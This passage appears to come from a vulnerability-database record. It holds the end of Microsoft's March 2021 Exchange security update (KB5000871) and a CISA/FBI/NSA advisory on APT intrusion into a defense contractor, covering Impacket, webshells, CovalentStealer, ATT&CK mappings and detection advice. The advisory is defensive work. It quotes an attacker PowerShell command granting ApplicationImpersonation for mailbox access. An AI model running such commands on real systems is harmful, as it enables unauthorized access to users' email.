2016 Cumulative Update 19 (KB5000871)](<https://www.microsoft.com/download/details.aspx?familyid=31211a48-0cef-462e-bb11-c36440f80bb3>)\n * [Download Security Update For Exchange Server 2016 Cumulative Update 18 (KB5000871)](<https://www.microsoft.com/download/details.aspx?familyid=192fa60f-664a-4f3e-b19f-e295135e469b>)\n * [Download Security Update For Exchange Server 2013 Cumulative Update 23 (KB5000871)](<https://www.microsoft.com/download/details.aspx?familyid=1255ecd7-b187-4839-96c9-1fc5e05df7b6>)\n**Version Updated on 3/8/2021 PST**\n\n * [Download Security Update For Exchange Server 2016 Cumulative Update 14 (KB5000871)](<https://www.microsoft.com/download/details.aspx?familyid=221f9562-f2af-4dda-a8a3-e5a81ddc5f2b>)\n * [Download Security Update For Exchange Server 2016 Cumulative Update 15 (KB5000871)](<https://www.microsoft.com/download/details.aspx?familyid=101995fc-65a6-47af-a580-5467c5e8c94a>)\n * [Download Security Update For Exchange Server 2016 Cumulative Update 16 (KB5000871)](<https://www.microsoft.com/download/details.aspx?familyid=923395c6-596a-4b11-afd2-0c72fda216c2>)\n * [Download Security Update For Exchange Server 2019 Cumulative Update 4 (KB5000871)](<https://www.microsoft.com/download/details.aspx?familyid=f27d8570-13b2-43c3-a18f-f1168caea67a>)\n * [Download Security Update For Exchange Server 2019 Cumulative Update 5 (KB5000871)](<https://www.microsoft.com/download/details.aspx?familyid=8326c47a-22e0-4e56-bcae-37071345889a>)\n * [Download Security Update For Exchange Server 2019 Cumulative Update 6 (KB5000871)](<https://www.microsoft.com/download/details.aspx?familyid=3773827e-9e6b-490a-85b0-890483734ee7>)\n**Version Updated on 3/10/2021 PST**\n\n * [Download Security Update For Exchange Server 2013 Cumulative Update 21 (KB5000871)](<https://www.microsoft.com/download/details.aspx?familyid=ff2120c8-2a3a-4717-bba3-7154f46d9f69>)\n * [Download Security Update For Exchange Server 2013 Cumulative Update 22 (KB5000871)](<https://www.microsoft.com/download/details.aspx?familyid=daa5f1bb-2b2b-4f12-956e-f393bc240acb>)\n * [Download Security Update For Exchange Server 2016 Cumulative Update 12 (KB5000871)](<https://www.microsoft.com/download/details.aspx?familyid=42eec775-c378-4796-a211-c35b12b1203c>)\n * [Download Security Update For Exchange Server 2016 Cumulative Update 13 (KB5000871)](<https://www.microsoft.com/download/details.aspx?familyid=d3e5727e-11fe-4794-a40b-e743a20d2ff9>)\n * [Download Security Update For Exchange Server 2016 Cumulative Update 17 (KB5000871)](<https://www.microsoft.com/download/details.aspx?familyid=1a07c860-4149-4a9e-b9cc-6a656a7e8916>)\n * [Download Security Update For Exchange Server 2019 Cumulative Update 3 (KB5000871)](<https://www.microsoft.com/download/details.aspx?familyid=8e245b3c-78c4-45b6-9d8d-d0c47f3b0b09>)\n**Version Updated on 3/11/2021 PST**\n\n * [Download Security Update For Exchange Server 2016 Cumulative Update 8 (KB5000871)](<https://www.microsoft.com/download/details.aspx?familyid=39d9c54e-430f-432e-b003-cb576a1d0b08>)\n * [Download Security Update For Exchange Server 2016 Cumulative Update 9 (KB5000871)](<https://www.microsoft.com/download/details.aspx?familyid=b786f573-baa8-4a0d-8933-aebec0f0f6fd>)\n * [Download Security Update For Exchange Server 2016 Cumulative Update 10 (KB5000871)](<https://www.microsoft.com/download/details.aspx?familyid=bc4bffc0-7b58-4a82-9d09-75fd8a802306>)\n * [Download Security Update For Exchange Server 2016 Cumulative Update 11 (KB5000871)](<https://www.microsoft.com/download/details.aspx?familyid=73f793d0-38f5-4c6c-a106-fb7bf181570c>)\n * [Download Security Update For Exchange Server 2019 RTM (KB5000871)](<https://www.microsoft.com/download/details.aspx?familyid=7d166723-516f-4029-bc55-9aa845849819>)\n * [Download Security Update For Exchange Server 2019 Cumulative Update 1 (KB5000871)](<https://www.microsoft.com/download/details.aspx?familyid=6731fe6c-009e-40fd-9b42-e35fd7e80f61>)\n * [Download Security Update For Exchange Server 2019 Cumulative Update 2 (KB5000871)](<https://www.microsoft.com/download/details.aspx?familyid=7a340894-f403-497e-a81e-c9acece4ced9>)\n**Version Updated on 3/16/2021 PST**[Download Security Update For Exchange Server 2013 SP1 (KB5000871)](<https://www.microsoft.com/download/details.aspx?familyid=a2d73741-7db1-4010-b907-602a6fc19996>)\n\n### Restart requirement\n\nThe required services are restarted automatically after you apply this update rollup.\n\n## File information\n\n### \n\n__\n\nFile hash information\n\nUpdate name| File name| SHA1 hash| SHA256 hash \n---|---|---|--- \nExchange Server 2019 Cumulative Update 6| Exchange2019-KB5000871-x64-en.msp| AAD0419DDDD998174DFB7A3DBC8E9347BEF069CC| F43DACE881230595678BEC7A0C24E17618CBA6196CDE86D80058B2BCF3A263B6 \nExchange Server 2019 Cumulative Update 5| Exchange2019-KB5000871-x64-en.msp| 4C7BDBC46D4CC019FD950D0940A9AB636BCED460| 5DBF2F3C65CA9B5D6A4E1B30EEC1327C17737E6ADA0B528BB83CD2D90ED3C8E9 \nExchange Server 2019 Cumulative Update 4| Exchange2019-KB5000871-x64-en.msp| E4FC011A78D9585028BF05ADA0ECC4C430CD5661| 9B1FCB9DCCBC398F3E894A1BBD34FD6583F315F743A205B889FE9755D3F4F807 \nExchange Server 2016 Cumulative Update 16| Exchange2016-KB5000871-x64-en.msp| 0BF4232C241185056CECBE86410FFED5D8FA734D| 992E059C01872BEE7FB2A3082FEE8C630332450220F9770BC2BBAC3769E9D2A8 \nExchange Server 2016 Cumulative Update 15| Exchange2016-KB5000871-x64-en.msp| 0D34278128408B787E593B827B238C3BB6C0A066| 0208AB1E3D1B9884D67130B355AB3A963DD3BB70FAECA12D1BE102DC78A0F38D \nExchange Server 2016 Cumulative Update 14| Exchange2016-KB5000871-x64-en.msp| 5832E46E0307F45C48785B4AD22F813829D3A51E| 0DFB6E97D4BE071D696C0CA7BF0F7DF06C9EB323A3E048038E69CD82A31CE5C4 \nExchange Server 2019 Cumulative Update 8| Exchange2019-KB5000871-x64-en.msp| C76D8D4B98CC052603967FAC211476F791679A2B| EC716655A910E204D5528B6017E6647A9B83C38714360138CD3FD036C2791A41 \nExchange Server 2019 Cumulative Update 7| Exchange2019-KB5000871-x64-en.msp| 515AB56A7EBF498CC23A915AA6D9456258CCAF2B| 1FAF5C2F995231A203A7C3FE97052AFD7924A6A57AC52155AC72DF825AB654C9 \nExchange Server 2016 Cumulative Update 19| Exchange2016-KB5000871-x64-en.msp| C75E8F5D987DAEFDFB57130F9C9C0EDCA71DF4DD| 26BBEA76A03363F6CFCFA60EC384BCC5DE021F06765FEAE1941EDD7A0C2AFFF4 \nExchange Server 2016 Cumulative Update 18| Exchange2016-KB5000871-x64-en.msp| 07DC026D54AD740B6B5C51F519FA5D6ED5ECE1D6| 7C7DA7E41628445FB7B6E8314F38530F0CC1F738153963CFFEA2D52F4E1E6B94 \nExchange Server 2013 Cumulative Update 23| Exchange2013-KB5000871-x64-en.msp| 44E0360D7A445E2E5E997094F70BC323FDB07156| 42ACE35CB2BF1202C6ABC2F3BCF689A244C9566ED9CC466D2AFBE6ED691D42E3 \nExchange Server 2019 Cumulative Update 3| Exchange2019-KB5000871-x64-en.msp| 5C1C0CC2657C78AF1C6893A2978EE4D615ED483C| DEFAFA95825644D7598171C820FB77A7DDBEE31183B51018424F333D4F65236A \nExchange Server 2016 Cumulative Update 17| Exchange2016-KB5000871-x64-en.msp| D973DC17959FD8FA88A6EB7C0AE4562DA9F27055| 4E83567ED4202C7784654C2707D15AB384EFEAA51121D5D0918BCC040CBFA91A \nExchange Server 2016 Cumulative Update 13| Exchange2016-KB5000871-x64-en.msp| D6756F4CDAC76C7227E9273A1E9637B5CA7CCEA1| 82DDB7B2B1E3C9D9FFB47C2A1F4813AF6D177F5748D2829F067F5D92EF1F38BB \nExchange Server 2016 Cumulative Update 12| Exchange2016-KB5000871-x64-en.msp| F5ABE454467D78C4B8D508FDA71829FAC235F0BA| 295325D460462F5A60E8AB7EFDB2EE15C718D5681A54D0CAC9091117E3A2B5DE \nExchange Server 2013 Cumulative Update 22| Exchange2013-KB5000871-x64-en.msp| AAE5CEB9F87F8A71E23E8B307B84F62D26F63EDE| D4FAC21AEDB062744FADFF7950BA5F00F83D94721BCEDA0077852359F9F9F74C \nExchange Server 2013 Cumulative Update 21| Exchange2013-KB5000871-x64-en.msp| E957C4FF6813EE2E5D3A6C21FCC8DADE63386C26| E7A4056271FF35BB7D45D70AFDA226A8F4C7B0033246E7C7DD679414A48AAF9D \nExchange Server 2019 Cumulative Update 2| Exchange2019-KB5000871-x64-en.msp| 462C4F88CFE30F4DCDBF197764D7D51721A7EA47| FDAA9379C910229A747170EDC4FF7E70235600F4CC30DAFA387858E4DB3CFC0C \nExchange Server 2019 Cumulative Update 1| Exchange2019-KB5000871-x64-en.msp| 5842708B5DA53C94142FFDC0BB6C5D865D67B6DA| 3134C249DF3F9A7B76AFFE7C257F01E3647BC63F680E0FD600CB78FEDE2E081B \nExchange Server 2019 RTM| Exchange2019-KB5000871-x64-en.msp| 68BDB11A41CA295CABBE344E5B2250928953215E| 482BBBA9A39C936184FFE37FFB193793CDB162FB3B96AEE3A927E6B54B191C3A \nExchange Server 2016 Cumulative Update 11| Exchange2016-KB5000871-x64-en.msp| 3372F90F5DAF170CD7DB097F0D915362F326413C| 4F041E8C752E15F26AA536C3158641E8E80E23124689714F2E4836AA7D3C03CA \nExchange Server 2016 Cumulative Update 10| Exchange2016-KB5000871-x64-en.msp| 860C7A83D9FB4CB7DDB368037648B9CE7AB26939| 8E31B64B8BD26A9F9A0D9454BAF220AACA9F4BC942BCF0B0ED5A2116DD212885 \nExchange Server 2016 Cumulative Update 9| Exchange2016-KB5000871-x64-en.msp| 4266CCE567D1F10CA62F07F9EB9DAC214A9B3CD5| 8F13226F12A5B14586B43A80136D9973FE6FBB5724015E84D40B44087766E52E \nExchange Server 2016 Cumulative Update 8| Exchange2016-KB5000871-x64-en.msp| A2530E9C4BCC009FBB772945A04C0A44FF9DD471| 7661ECCFA103A177855C8AFFE8DDFEA0D8BDD949B6490976DC7A43CC0CD9078F \nExchange Server 2013 SP1| Exchange2013-KB5000871-x64-en.msp| A4C9FD8BE1208E90D383AD7349754459FCCA071C| D0CCE0312FCEC4E639A18C9A2E34B736838DC741BAD188370CBFFFA68A81B192 \n \n### Exchange server file information\n\nDownload the [list of files that are included in this security update KB5000871](<https://download.microsoft.com/download/6/6/4/664dbcf2-bef2-4873-8bc2-2db5c9fce9ef/Files list.csv>).\n\n## More information\n\n### Security update replacement information\n\nThis security update replaces the following previously released updates:\n\n * Description of the security update for Microsoft Exchange Server 2019 and 2016: February 9, 2021\n\n## Information about protection and security\n\nProtect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151>)Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-02T08:00:00", "type": "mskb", "title": "Description of the security update for Microsoft Exchange Server 2019, 2016, and 2013: March 2, 2021 (KB5000871)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-03-02T08:00:00", "id": "KB5000871", "href": "https://support.microsoft.com/en-us/help/5000871", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ics": [{"lastseen": "2023-09-09T20:53:19", "description": "### Summary\n\nActions to Help Protect Against APT Cyber Activity:\n\n\u2022 Enforce multifactor authentication (MFA) on all user accounts. \n\u2022 Implement network segmentation to separate network segments based on role and functionality. \n\u2022 Update software, including operating systems, applications, and firmware, on network assets. \n\u2022 Audit account usage.\n\nFrom November 2021 through January 2022, the Cybersecurity and Infrastructure Security Agency (CISA) responded to advanced persistent threat (APT) activity on a Defense Industrial Base (DIB) Sector organization\u2019s enterprise network. During incident response activities, CISA uncovered that likely multiple APT groups compromised the organization\u2019s network, and some APT actors had long-term access to the environment. APT actors used an open-source toolkit called Impacket to gain their foothold within the environment and further compromise the network, and also used a custom data exfiltration tool, CovalentStealer, to steal the victim\u2019s sensitive data.\n\nThis joint Cybersecurity Advisory (CSA) provides APT actors tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) identified during the incident response activities by CISA and a third-party incident response organization. The CSA includes detection and mitigation actions to help organizations detect and prevent related APT activity. CISA, the Federal Bureau of Investigation (FBI), and the National Security Agency (NSA) recommend DIB sector and other critical infrastructure organizations implement the mitigations in this CSA to ensure they are managing and reducing the impact of cyber threats to their networks.\n\nDownload the PDF version of this report: pdf, 692 KB\n\nFor a downloadable copy of IOCs, see the following files:\n\n * [Malware Analysis Report (MAR)-10365227-1.stix, 966 kb](<https://www.cisa.gov/uscert/sites/default/files/publications/MAR-10365227.r1.v1.WHITE_stix_7.xml>)\n * [MAR-10365227-2.stix, 249B](<https://www.cisa.gov/uscert/sites/default/files/publications/MAR-10365227.r2.v1.WHITE_stix.xml>)\n * [MAR-10365227-3.stix, 3.2 MB](<https://www.cisa.gov/uscert/sites/default/files/publications/MAR-10365227.r3.v1.WHITE_stix_0.xml>)\n\n### Technical Details\n\n#### **Threat Actor Activity**\n\n**Note**: _This advisory uses the [MITRE ATT&CK\u00ae for Enterprise](<https://attack.mitre.org/versions/v11/matrices/enterprise/>) framework, version 11. See the MITRE ATT&CK Tactics and Techniques section for a table of the APT cyber activity mapped to MITRE ATT&CK for Enterprise framework._\n\nFrom November 2021 through January 2022, CISA conducted an incident response engagement on a DIB Sector organization\u2019s enterprise network. The victim organization also engaged a third-party incident response organization for assistance. During incident response activities, CISA and the trusted \u2013third-party identified APT activity on the victim\u2019s network.\n\nSome APT actors gained initial access to the organization\u2019s Microsoft Exchange Server as early as mid-January 2021. The initial access vector is unknown. Based on log analysis, the actors gathered information about the exchange environment and performed mailbox searches within a four-hour period after gaining access. In the same period, these actors used a compromised administrator account (\u201cAdmin 1\u201d) to access the EWS Application Programming Interface (API). In early February 2021, the actors returned to the network and used Admin 1 to access EWS API again. In both instances, the actors used a virtual private network (VPN).\n\nFour days later, the APT actors used Windows Command Shell over a three-day period to interact with the victim\u2019s network. The actors used Command Shell to learn about the organization\u2019s environment and to collect sensitive data, including sensitive contract-related information from shared drives, for eventual exfiltration. The actors manually collected files using the command-line tool, WinRAR. These files were split into approximately 3MB chunks located on the Microsoft Exchange server within the CU2\\he\\debug directory. See Appendix: Windows Command Shell Activity for additional information, including specific commands used.\n\nDuring the same period, APT actors implanted [Impacket](<https://attack.mitre.org/versions/v11/software/S0357/>), a Python toolkit for programmatically constructing and manipulating network protocols, on another system. The actors used Impacket to attempt to move laterally to another system.\n\nIn early March 2021, APT actors exploited CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 to install 17 China Chopper webshells on the Exchange Server. Later in March, APT actors installed HyperBro on the Exchange Server and two other systems. For more information on the HyperBro and webshell samples, see CISA [MAR-10365227-2](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-277b>) and [-3](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-277c>).\n\nIn April 2021, APT actors used Impacket for network exploitation activities. See the Use of Impacket section for additional information. From late July through mid-October 2021, APT actors employed a custom exfiltration tool, CovalentStealer, to exfiltrate the remaining sensitive files. See the Use of Custom Exfiltration Tool: CovalentStealer section for additional information.\n\nAPT actors maintained access through mid-January 2022, likely by relying on legitimate credentials.\n\n#### **Use of Impacket**\n\nCISA discovered activity indicating the use of two Impacket tools: wmiexec.py and smbexec.py. These tools use Windows Management Instrumentation (WMI) and Server Message Block (SMB) protocol, respectively, for creating a semi-interactive shell with the target device. Through the Command Shell, an Impacket user with credentials can run commands on the remote device using the Windows management protocols required to support an enterprise network.\n\nThe APT cyber actors used existing, compromised credentials with Impacket to access a higher privileged service account used by the organization's multifunctional devices. The threat actors first used the service account to remotely access the organization\u2019s Microsoft Exchange server via Outlook Web Access (OWA) from multiple external IP addresses; shortly afterwards, the actors assigned the Application Impersonation role to the service account by running the following PowerShell command for managing Exchange:\n\npowershell add-pssnapin *exchange*;New-ManagementRoleAssignment - name:\"Journaling-Logs\" -Role:ApplicationImpersonation -User:<account>\n\nThis command gave the service account the ability to access other users\u2019 mailboxes.\n\nThe APT cyber actors used virtual private network (VPN) and virtual private server (VPS) providers, M247 and SurfShark, as part of their techniques to remotely access the Microsoft Exchange server. Use of these hosting providers, which serves to conceal interaction with victim networks, are common for these threat actors. According to CISA\u2019s analysis of the victim\u2019s Microsoft Exchange server Internet Information Services (IIS) logs, the actors used the account of a former employee to access the EWS. EWS enables access to mailbox items such as email messages, meetings, and contacts. The source IP address for these connections is mostly from the VPS hosting provider, M247.\n\n#### Use of Custom Exfiltration Tool: CovalentStealer\n\nThe threat actors employed a custom exfiltration tool, CovalentStealer, to exfiltrate sensitive files.\n\nCovalentStealer is designed to identify file shares on a system, categorize the files, and upload the files to a remote server. CovalentStealer includes two configurations that specifically target the victim's documents using predetermined files paths and user credentials. CovalentStealer stores the collected files on a Microsoft OneDrive cloud folder, includes a configuration file to specify the types of files to collect at specified times and uses a 256-bit AES key for encryption. See CISA [MAR-10365227-1](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-277a>) for additional technical details, including IOCs and detection signatures.\n\n#### MITRE ATT&CK Tactics and Techniques\n\nMITRE ATT&CK is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. CISA uses the ATT&CK Framework as a foundation for the development of specific threat models and methodologies. Table 1 lists the ATT&CK techniques employed by the APT actors.\n\n_Table 1: Identified APT Enterprise ATT&CK Tactics and Techniques_\n\n_Initial Access_ \n \n--- \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nValid Accounts\n\n| \n\n[T1078](<https://attack.mitre.org/versions/v11/techniques/T1078/>)\n\n| \n\nActors obtained and abused credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. In this case, they exploited an organization\u2019s multifunctional device domain account used to access the organization\u2019s Microsoft Exchange server via OWA. \n \n_Execution_ \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nWindows Management Instrumentation\n\n| \n\n[T1047](<https://attack.mitre.org/versions/v11/techniques/T1047/>)\n\n| \n\nActors used Impacket tools wmiexec.py and smbexec.py to leverage Windows Management Instrumentation and execute malicious commands. \n \nCommand and Scripting Interpreter\n\n| \n\n[T1059](<https://attack.mitre.org/versions/v11/techniques/T1059/003/>)\n\n| \n\nActors abused command and script interpreters to execute commands. \n \nCommand and Scripting Interpreter: PowerShell\n\n| \n\n[T1059.001](<https://attack.mitre.org/techniques/T1059/001>)\n\n| \n\nActors abused PowerShell commands and scripts to map shared drives by specifying a path to one location and retrieving the items from another. See Appendix: Windows Command Shell Activity for additional information. \n \nCommand and Scripting Interpreter: Windows Command Shell\n\n| \n\n[T1059.003](<https://attack.mitre.org/versions/v11/techniques/T1059/003/>)\n\n| \n\nActors abused the Windows Command Shell to learn about the organization\u2019s environment and to collect sensitive data. See Appendix: Windows Command Shell Activity for additional information, including specific commands used.\n\nThe actors used Impacket tools, which enable a user with credentials to run commands on the remote device through the Command Shell. \n \nCommand and Scripting Interpreter: Python\n\n| \n\n[T1059.006](<https://attack.mitre.org/versions/v11/techniques/T1059/006/>)\n\n| \n\nThe actors used two Impacket tools: wmiexec.py and smbexec.py. \n \nShared Modules\n\n| \n\n[T1129](<https://attack.mitre.org/techniques/T1129>)\n\n| \n\nActors executed malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. \n \nSystem Services\n\n| \n\n[T1569](<https://attack.mitre.org/versions/v11/techniques/T1569/>)\n\n| \n\nActors abused system services to execute commands or programs on the victim\u2019s network. \n \n_Persistence_ \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nValid Accounts\n\n| \n\n[T1078](<https://attack.mitre.org/versions/v11/techniques/T1078/>)\n\n| \n\nActors obtained and abused credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. \n \nCreate or Modify System Process\n\n| \n\n[T1543](<https://attack.mitre.org/versions/v11/techniques/T1543/>)\n\n| \n\nActors were observed creating or modifying system processes. \n \n_Privilege Escalation_ \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nValid Accounts\n\n| \n\n[T1078](<https://attack.mitre.org/versions/v11/techniques/T1078/>)\n\n| \n\nActors obtained and abused credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. In this case, they exploited an organization\u2019s multifunctional device domain account used to access the organization\u2019s Microsoft Exchange server via OWA. \n \n_Defense Evasion_ \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nMasquerading: Match Legitimate Name or Location\n\n| \n\n[T1036.005](<https://attack.mitre.org/versions/v11/techniques/T1036/005>)\n\n| \n\nActors masqueraded the archive utility WinRAR.exe by renaming it VMware.exe to evade defenses and observation. \n \nIndicator Removal on Host\n\n| \n\n[T1070](<https://attack.mitre.org/versions/v11/techniques/T1070/004/>)\n\n| \n\nActors deleted or modified artifacts generated on a host system to remove evidence of their presence or hinder defenses. \n \nIndicator Removal on Host: File Deletion\n\n| \n\n[T1070.004](<https://attack.mitre.org/versions/v11/techniques/T1070/004/>)\n\n| \n\nActors used the del.exe command with the /f parameter to force the deletion of read-only files with the *.rar and tempg* wildcards. \n \nValid Accounts\n\n| \n\n[T1078](<https://attack.mitre.org/versions/v11/techniques/T1078/>)\n\n| \n\nActors obtained and abused credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. In this case, they exploited an organization\u2019s multifunctional device domain account used to access the organization\u2019s Microsoft Exchange server via OWA. \n \nVirtualization/Sandbox Evasion: System Checks\n\n| \n\n[T1497.001](<https://attack.mitre.org/techniques/T1497/001>)\n\n| \n\nActors used Windows command shell commands to detect and avoid virtualization and analysis environments. See Appendix: Windows Command Shell Activity for additional information. \n \nImpair Defenses: Disable or Modify Tools\n\n| \n\n[T1562.001](<https://attack.mitre.org/techniques/T1562/001>)\n\n| \n\nActors used the taskkill command to probably disable security features. CISA was unable to determine which application was associated with the Process ID. \n \nHijack Execution Flow\n\n| \n\n[T1574](<https://attack.mitre.org/versions/v11/techniques/T1574/>)\n\n| \n\nActors were observed using hijack execution flow. \n \n_Discovery_ \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nSystem Network Configuration Discovery\n\n| \n\n[T1016](<https://attack.mitre.org/techniques/T1016>)\n\n| \n\nActors used the systeminfo command to look for details about the network configurations and settings and determine if the system was a VMware virtual machine.\n\nThe threat actor used route print to display the entries in the local IP routing table. \n \nSystem Network Configuration Discovery: Internet Connection Discovery\n\n| \n\n[T1016.001](<https://attack.mitre.org/techniques/T1016/001>)\n\n| \n\nActors checked for internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways. \n \nSystem Owner/User Discovery\n\n| \n\n[T1033](<https://attack.mitre.org/techniques/T1033>)\n\n| \n\nActors attempted to identify the primary user, currently logged in user, set of users that commonly use a system, or whether a user is actively using the system. \n \nSystem Network Connections Discovery\n\n| \n\n[T1049](<https://attack.mitre.org/techniques/T1049>)\n\n| \n\nActors used the netstat command to display TCP connections, prevent hostname determination of foreign IP addresses, and specify the protocol for TCP. \n \nProcess Discovery\n\n| \n\n[T1057](<https://attack.mitre.org/techniques/T1057>)\n\n| \n\nActors used the tasklist command to get information about running processes on a system and determine if the system was a VMware virtual machine.\n\nThe actors used tasklist.exe and find.exe to display a list of applications and services with their PIDs for all tasks running on the computer matching the string \u201cpowers.\u201d \n \nSystem Information Discovery\n\n| \n\n[T1082](<https://attack.mitre.org/techniques/T1082>)\n\n| \n\nActors used the ipconfig command to get detailed information about the operating system and hardware and determine if the system was a VMware virtual machine. \n \nFile and Directory Discovery\n\n| \n\n[T1083](<https://attack.mitre.org/techniques/T1083>)\n\n| \n\nActors enumerated files and directories or may search in specific locations of a host or network share for certain information within a file system. \n \nVirtualization/Sandbox Evasion: System Checks\n\n| \n\n[T1497.001](<https://attack.mitre.org/techniques/T1497/001>)\n\n| \n\nActors used Windows command shell commands to detect and avoid virtualization and analysis environments. \n \n_Lateral Movement_ \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nRemote Services: SMB/Windows Admin Shares\n\n| \n\n[T1021.002](<https://attack.mitre.org/techniques/T1021/002>)\n\n| \n\nActors used Valid Accounts to interact with a remote network share using Server Message Block (SMB) and then perform actions as the logged-on user. \n \n_Collection_ \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nArchive Collected Data: Archive via Utility\n\n| \n\n[T1560.001](<https://attack.mitre.org/techniques/T1560>)\n\n| \n\nActor used PowerShell commands and WinRAR to compress and/or encrypt collected data prior to exfiltration. \n \nData from Network Shared Drive\n\n| \n\n[T1039](<https://attack.mitre.org/versions/v11/techniques/T1039/>)\n\n| \n\nActors likely used net share command to display information about shared resources on the local computer and decide which directories to exploit, the powershell dir command to map shared drives to a specified path and retrieve items from another, and the ntfsinfo command to search network shares on computers they have compromised to find files of interest.\n\nThe actors used dir.exe to display a list of a directory's files and subdirectories matching a certain text string. \n \nData Staged: Remote Data Staging\n\n| \n\n[T1074.002](<https://attack.mitre.org/versions/v11/techniques/T1074/002/>)\n\n| \n\nThe actors split collected files into approximately \n3 MB chunks located on the Exchange server within the CU2\\he\\debug directory. \n \n_Command and Control_ \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nNon-Application Layer Protocol\n\n| \n\n[T1095](<https://attack.mitre.org/techniques/T1095>)\n\n| \n\nActors used a non-application layer protocol for communication between host and Command and Control (C2) server or among infected hosts within a network. \n \nIngress Tool Transfer\n\n| \n\n[T1105](<https://attack.mitre.org/versions/v11/techniques/T1105/>)\n\n| \n\nActors used the certutil command with three switches to test if they could download files from the internet.\n\nThe actors employed CovalentStealer to exfiltrate the files. \n \nProxy\n\n| \n\n[T1090](<https://attack.mitre.org/versions/v11/techniques/T1090/>)\n\n| \n\nActors are known to use VPN and VPS providers, namely M247 and SurfShark, as part of their techniques to access a network remotely. \n \n_Exfiltration_ \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nSchedule Transfer\n\n| \n\n[T1029](<https://attack.mitre.org/versions/v11/techniques/T1029/>)\n\n| \n\nActors scheduled data exfiltration to be performed only at certain times of day or at certain intervals and blend traffic patterns with normal activity. \n \nExfiltration Over Web Service: Exfiltration to Cloud Storage\n\n| \n\n[T1567.002](<https://attack.mitre.org/versions/v11/techniques/T1567/002>)\n\n| \n\nThe actor's CovalentStealer tool stores collected files on a Microsoft OneDrive cloud folder. \n \n### DETECTION\n\nGiven the actors\u2019 demonstrated capability to maintain persistent, long-term access in compromised enterprise environments, CISA, FBI, and NSA encourage organizations to:\n\n * Monitor logs for connections from unusual VPSs and VPNs. Examine connection logs for access from unexpected ranges, particularly from machines hosted by SurfShark and M247.\n * Monitor for suspicious account use (e.g., inappropriate or unauthorized use of administrator accounts, service accounts, or third-party accounts). To detect use of compromised credentials in combination with a VPS, follow the steps below: \n * Review logs for \"impossible logins,\" such as logins with changing username, user agent strings, and IP address combinations or logins where IP addresses do not align to the expected user\u2019s geographic location.\n * Search for \"impossible travel,\" which occurs when a user logs in from multiple IP addresses that are a significant geographic distance apart (i.e., a person could not realistically travel between the geographic locations of the two IP addresses in the time between logins). Note: This detection opportunity can result in false positives if legitimate users apply VPN solutions before connecting to networks.\n * Search for one IP used across multiple accounts, excluding expected logins. \n * Take note of any M247-associated IP addresses used along with VPN providers (e.g., SurfShark). Look for successful remote logins (e.g., VPN, OWA) for IPs coming from M247- or using SurfShark-registered IP addresses.\n * Identify suspicious privileged account use after resetting passwords or applying user account mitigations.\n * Search for unusual activity in typically dormant accounts.\n * Search for unusual user agent strings, such as strings not typically associated with normal user activity, which may indicate bot activity.\n * Review the YARA rules provided in MAR-10365227-1 to assist in determining whether malicious activity has been observed.\n * Monitor for the installation of unauthorized software, including Remote Server Administration Tools (e.g., psexec, RdClient, VNC, and ScreenConnect).\n * Monitor for anomalous and known malicious command-line use. See Appendix: Windows Command Shell Activity for commands used by the actors to interact with the victim\u2019s environment.\n * Monitor for unauthorized changes to user accounts (e.g., creation, permission changes, and enabling a previously disabled account).\n\n### CONTAINMENT AND REMEDIATION\n\nOrganizations affected by active or recently active threat actors in their environment can take the following initial steps to aid in eviction efforts and prevent re-entry:\n\n * Report the incident. Report the incident to U.S. Government authorities and follow your organization\u2019s incident response plan. \n * Report incidents to CISA via CISA\u2019s 24/7 Operations Center ([report@cisa.gov](<mailto:report@cisa.gov>) or 888-282-0870).\n * Report incidents to your local FBI field office at [fbi.gov/contact-us/field-offices](<http://www.fbi.gov/contact-us/field>) or to FBI\u2019s 24/7 Cyber Watch 